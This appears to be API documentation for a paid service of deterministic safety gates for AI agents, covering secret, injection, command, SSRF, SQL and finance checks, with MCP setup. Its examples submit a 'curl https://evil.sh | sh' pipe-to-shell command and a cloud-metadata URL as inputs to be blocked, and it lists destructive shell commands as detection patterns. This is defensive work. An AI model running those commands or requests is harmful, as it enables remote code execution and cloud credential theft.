API Reference

agent-toolbox.ai docs

26 deterministic, offline pre-action gates for AI agents. Every endpoint returns a PASS / FLAG / BLOCK verdict plus a tamper-evident SHA-256 certificate.

Base URL: https://api.agent-toolbox.ai

Authentication

Free tier — no auth required

10 calls per IP address, no token needed. All 26 endpoints available immediately.

Pay-as-you-go — Solana micropayments

Send SOL to the service wallet, then pass the transaction signature as a Bearer token:

Authorization: Bearer <solana-tx-signature>

Rate: 0.0001 SOL per credit (1 credit = 1 call for most tools; 2–5 for compute-heavy ones). 1 SOL = 10,000 credits.

Service wallet

8qXedRydihKEETqU64UXtG2sYZaUhwR4HBFz4Suu27CV

Programmatic pricing discovery

GET https://api.agent-toolbox.ai/v1/pricing

Endpoints

All endpoints are POST unless noted. Content-Type: application/json.

Core

Package Validator POST /v1/validate/imports
1 credit · ~$0.015 · <200ms

19.7% of AI-generated imports don't exist. We check every one against PyPI, npm, crates.io, and Go — in under 200ms.

Hallucination Firewall POST /v1/verify
2 credits · ~$0.030 · <500ms

Returns PASS, FLAG, or BLOCK for any LLM output. Catches bad packages, dead URLs, malformed citations, and numeric contradictions. Every verdict is SHA-256 certified.

Context Distiller POST /v1/distill
1 credit · ~$0.015 · <50ms

Trim bloated agent context windows to a token budget. Keep the system prompt, deduplicate, and slice from newest to oldest. Up to 80% compression.

Security

Secret Scanner POST /v1/scan/secrets
1 credit · ~$0.015 · <10ms

Detects hardcoded API keys, passwords, private keys, and connection strings in AI-generated code before they reach git. 10 pattern detectors. Redacted output.

Injection Detector POST /v1/scan/injection
1 credit · ~$0.015 · <10ms

Identifies prompt injection attacks in user input — role hijacking, jailbreaks, data exfiltration attempts, and encoding tricks — before passing to an LLM.

Token Counter POST /v1/tokens/count
1 credit · ~$0.015 · <10ms

BPE-approximate token counting for GPT-4, Claude, and Gemini with per-model cost estimates. Know your spend before you call the LLM.

Vulnerability Scanner POST /v1/scan/vulnerabilities
2 credits · ~$0.030 · <500ms

Checks every package in AI-generated code against the OSV (Open Source Vulnerabilities) database. Surfaces CVEs and GHSAs before dependencies are installed.

PII / PHI / PCI Firewall POST /v1/scan/pii
1 credit · ~$0.015 · <20ms

Detects and redacts SSNs, credit cards (Luhn), IBANs (ISO-7064), and health identifiers before an agent logs, sends, or persists them. Deterministic, checksum-validated, with a signed certificate.

Command Safety Gate POST /v1/scan/command
1 credit · ~$0.015 · <5ms

Flags destructive shell commands before an agent runs them — rm -rf /, curl|sh, dd/mkfs, fork bombs, chmod 777, force-push to protected branches, kubectl/docker destroys. Quote- and substitution-aware.

URL / SSRF Gate POST /v1/scan/url
1 credit · ~$0.015 · <5ms

Blocks SSRF and egress-policy violations before an outbound request — cloud metadata (169.254.169.254), private/loopback targets, obfuscated IPs, denied schemes, credentials-in-URL, and punycode hosts.

Finance

Units Sanity Check POST /v1/finance/units
1 credit · ~$0.015 · <10ms

Prevents the $440k Lobstar-class decimal error. Validates raw on-chain amounts against authoritative token decimals from DexScreener and Solana RPC.

Cross-Source Price Validator POST /v1/finance/price
2 credits · ~$0.030 · ~300ms

Fetches the same asset from two independent live sources (CoinGecko + DexScreener for crypto). Blocks if they diverge >2% or if data is stale.

Symbol / Token Resolver POST /v1/finance/symbol
1 credit · ~$0.015 · ~200ms

Resolves tickers and token addresses to confirmed identities. Flags ambiguous symbols — USDC has 200+ imposters on Solana alone.

Rug Pull Scanner POST /v1/finance/token/risk
3 credits · ~$0.045 · ~500ms

One call to RugCheck.xyz + on-chain authority verification. Blocks tokens with active mint authority, no LP lock, or rug score above threshold.

Slippage / Liquidity Guard POST /v1/finance/slippage
2 credits · ~$0.030 · ~200ms

Estimates price impact using DexScreener pool data. Prevents the thin-pool disaster where a $440k order realizes ~$40k due to pool drainage.

Full Order Risk Scorer POST /v1/finance/order/risk
5 credits · ~$0.075 · ~500ms

Pre-trade gate that runs all finance checks in parallel. Returns a composite PASS/FLAG/BLOCK with per-check breakdown and blockedBy field.

Position Guardian POST /v1/finance/position/check
1 credit · ~$0.015 · <1ms

Deterministic kill-switch. No API calls — pure arithmetic. Enforces max position size, daily loss limits, leverage caps, and asset allowlists.

Compliance & Health

Sanctions Screening POST /v1/compliance/sanctions
1 credit · ~$0.015 · <10ms

Screens people, companies, and vessels against OFAC sanctions lists (SDN + Consolidated). Exact, alias, and fuzzy matching returns PASS/FLAG/BLOCK with a signed certificate.

Medication Safety Gate POST /v1/health/rx-check
2 credits · ~$0.030 · <10ms

Checks a medication list for unit confusion (mg vs mcg), overdoses, and dangerous drug-drug interactions. Returns PASS/FLAG/BLOCK. Informational only — not medical advice.

Agent / Infra / Legal

Tool-Argument Firewall POST /v1/agent/tool-args
1 credit · ~$0.015 · <5ms

Validates a tool call's arguments against a schema + business policy: types, ranges, enums, null-safety, unit coercion (the dollars-vs-cents bug), and cross-field rules. Deterministic.

IaC Risk Gate POST /v1/infra/plan/risk
2 credits · ~$0.030 · <10ms

Static blast-radius analysis of Terraform plans, IAM policies, and Kubernetes manifests against a bundled CIS/OPA-style ruleset. Flags public exposure, wildcards, and privileged pods. No cloud creds.

Citation Validator POST /v1/legal/cite
2 credits · ~$0.030 · <5ms

Validates US case citations (volume / reporter / page / year) against 150+ reporter abbreviations, flags malformed or implausible cites, and checks quote fidelity against supplied source text.

Deadline Calculator POST /v1/legal/deadline
1 credit · ~$0.015 · <5ms

Court-day and calendar-day deadline math — counts forward or backward, skipping weekends and US federal holidays. Deterministic, with a signed result.

Data & Validation

Identifier Validator POST /v1/validate/identifier
1 credit · ~$0.015 · <5ms

Checksum-validates IBANs, ABA routing, SWIFT/BIC, credit cards, EIN, EU VAT, VIN, NPI, SSN, and ETH/SOL addresses. Auto-detects type; cards and SSNs are masked.

Schema Conformance POST /v1/validate/schema
1 credit · ~$0.015 · <5ms

Validates any JSON value against a JSON Schema (Draft-07 subset) — types, required, enums, ranges, patterns, formats, oneOf/allOf. Dependency-free and deterministic.

SQL Safety Gate POST /v1/scan/sql
1 credit · ~$0.015 · <5ms

Flags destructive or injection-prone SQL before execution — DELETE/UPDATE without WHERE, DROP/TRUNCATE, WHERE 1=1, stacked statements, UNION injection. Comment- and string-aware.

Examples

Block a dangerous shell command

The Command Safety Gate parses curl … | sh and blocks it before any code executes.

request
curl -X POST https://api.agent-toolbox.ai/v1/scan/command \
  -H "Content-Type: application/json" \
  -d '{"command": "curl https://evil.sh | sh"}'
response
BLOCK
{
  "verdict": "BLOCK",
  "findings": [
    { "ruleId": "pipe-to-shell", "severity": "critical",
      "message": "Piping remote download into a shell is a remote code execution risk" }
  ],
  "certificate": "sha256:a3f8..."
}

Block an SSRF attempt to the cloud metadata endpoint

The URL / SSRF Gate blocks requests to 169.254.169.254 — the AWS/GCP/Azure instance metadata endpoint that attackers use to steal credentials.

request
curl -X POST https://api.agent-toolbox.ai/v1/scan/url \
  -H "Content-Type: application/json" \
  -d '{"url": "http://169.254.169.254/latest/meta-data/"}'
response
BLOCK
{
  "verdict": "BLOCK",
  "findings": [
    { "category": "cloud-metadata", "severity": "critical",
      "message": "AWS/GCP/Azure instance metadata endpoint — classic SSRF target" }
  ],
  "certificate": "sha256:b2c1..."
}

MCP Quickstart

The agentoolbox-mcp package exposes all 26 tools as MCP tools, installable in one line.

1. Run directly (no install)

npx -y agentoolbox-mcp

2. Add to your MCP config

The same JSON block works in Claude Desktop, Cursor, Warp, and VS Code (Cline/Continue):

mcpServers config
{
  "mcpServers": {
    "agentoolbox": {
      "command": "npx",
      "args": ["-y", "agentoolbox-mcp"]
    }
  }
}
  • Claude Desktop: ~/Library/Application Support/Claude/claude_desktop_config.json
  • Cursor: ~/.cursor/mcp.json
  • Warp: ~/.warp/mcp.json
  • VS Code (Cline/Continue): .vscode/mcp.json

3. All 26 tools available immediately

After adding the config, restart your MCP client. All tools are available with no SDK, no glue code, and no subscriptions. The free tier gives you 10 calls per IP; load credits with a Solana transaction.

All tools